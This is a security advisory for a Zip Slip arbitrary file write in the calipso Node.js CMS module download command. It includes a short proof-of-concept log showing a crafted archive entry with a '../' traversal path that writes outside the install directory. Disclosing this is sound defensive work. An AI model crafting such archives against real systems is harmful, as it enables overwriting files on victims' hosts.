Arbitrary File Write via Archive Extraction (Zip Slip) Affecting calipso package, versions *

  • Severity 7.1 high
  • Exploit Maturity Mature
  • Attack Complexity Low
  • Confidentiality High

  • Snyk ID SNYK-JS-CALIPSO-1300555
  • published 7 Jun 2021
  • disclosed 6 Jun 2021
  • credit Sam Sanoop of Snyk Security Team

How to fix?

There is no fixed version for calipso.


calipso is a simple NodeJS content management system based on Express, Connect & Mongoose.

Affected versions of this package are vulnerable to Arbitrary File Write via Archive Extraction (Zip Slip). A malicious module archive can overwrite files at arbitrary locations on the host file system through the module install functionality (`calipso modules download`).


 ✗ calipso modules download
Launching calipso from: /home/snoopy/MySite
Calipso directory: /home/snoopy/.nvm/versions/node/v8.17.0/lib/node_modules/calipso/lib/../

Resolving file location, and downloading ... (node:14850) [DEP0029] DeprecationWarning: util.error is deprecated. Use console.error instead. Redirecting to ...

Resolving file location, and downloading ... [0%...25%....50%....75%....100%]

Downloaded ../../../../../../../../tmp/foo.txt 0
Downloaded evil/.gitignore 89
Downloaded evil/elastic.js 8757
Downloaded evil/templates/results.html 1220
Downloaded evil/package.json 409
Downloaded evil/test.txt 4
Downloaded evil/README 0
/home/snoopy/MySite/modules/downloaded/elastic/
Installing elastic via npm, output will show below (may be a small delay):